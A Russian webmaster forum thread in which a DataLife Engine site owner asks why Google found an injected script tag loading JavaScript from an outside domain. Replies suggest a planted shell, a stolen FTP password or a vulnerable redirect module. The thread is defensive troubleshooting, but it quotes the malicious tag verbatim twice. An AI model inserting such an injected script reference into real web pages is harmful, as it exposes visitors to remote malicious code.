Вредоносный код на сайте

12
kiyuni
На сайте с 30.10.2010
Offline
64
931

Здравствуйте, есть сайт на dle, недавно гугл обнаружил на нем следующий вредоносный код

<script src="http://picturevk.msk.ru/23a2bd0aca5824397c142b6
6327f362f.js" type="text/javascript">

на странице http://www.soft-windows7.ru/security/, не имею понятия, откуда он взялся :confused::madd:

Может кто-то сталкивался с подобной проблемой и поможет?

G
На сайте с 12.04.2008
Offline
101
#1

Посмотрите этот раздел - многие сталкивались.

- дыра на сайте

- шелл на сайте

- нулленая версия с прошитыми ссылками

Вариантов много.

Продажа сайтов (/ru/forum/866932) под Amazon и AdSense
Fredy314
На сайте с 07.02.2009
Offline
63
#2

Часто бывает что спалили ФТП пароль от сайта и прописали в index.php в начало или конец. Думаю такое действие даже какие-то боты делают

Магазин аккаунтов (http://aaze.ru/) - почтовые аки, фрихосты, соцсети.
P
На сайте с 20.11.2010
Offline
30
#3

Нужно искать левые скрипты в коде страниц и удалять. А что бы такое не повторялось лечи компьютер.

kiyuni
На сайте с 30.10.2010
Offline
64
#4
panferowa:
Нужно искать левые скрипты в коде страниц и удалять. А что бы такое не повторялось лечи компьютер.

В коде страницы, я нашел, а вот как удалить не знаю ((

Mr.Caldre
На сайте с 15.02.2011
Offline
1
#5

Земляк:)

Напишите мне в icq - помогу.

G
На сайте с 12.04.2008
Offline
101
#6

Удалить это одной, а найти причину по которой он там появляется - иное. Можно в день по 5 раз удалять

M
На сайте с 20.01.2009
Offline
221
#7
<script src="http://picturevk.msk.ru/23a2bd0aca5824397c142b6
6327f362f.js" type="text/javascript">

Лохи в JS - любители

Мониторинг, анализ и проверка позиций сайта в поисковых системах (http://allpositions.ru/redirect/820)
kiyuni
На сайте с 30.10.2010
Offline
64
#8

Ссылки добавляются в конце статьи, а также добавлют запись в dle_post. Из дополнений стоит только redirect_1.1_vkontakte, думаю возможна проблема в нем.

infin1ty
На сайте с 03.06.2009
Offline
116
#9
kiyuni:
Из дополнений стоит только redirect_1.1_vkontakte, думаю возможна проблема в нем.

Если я не ошибаюсь то в этом модуле есть большая дыра. В любом случае в каком-то из редиректов.

Нужно сначала закрыть сайт от повторного взлома, удалить шеллы если есть, а потом уже удалять вредоносный код и всякую дурь которую залили.

G
На сайте с 12.04.2008
Offline
101
#10

Обратитесь ко мне - я помогу найти дыры и закрыть и все.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий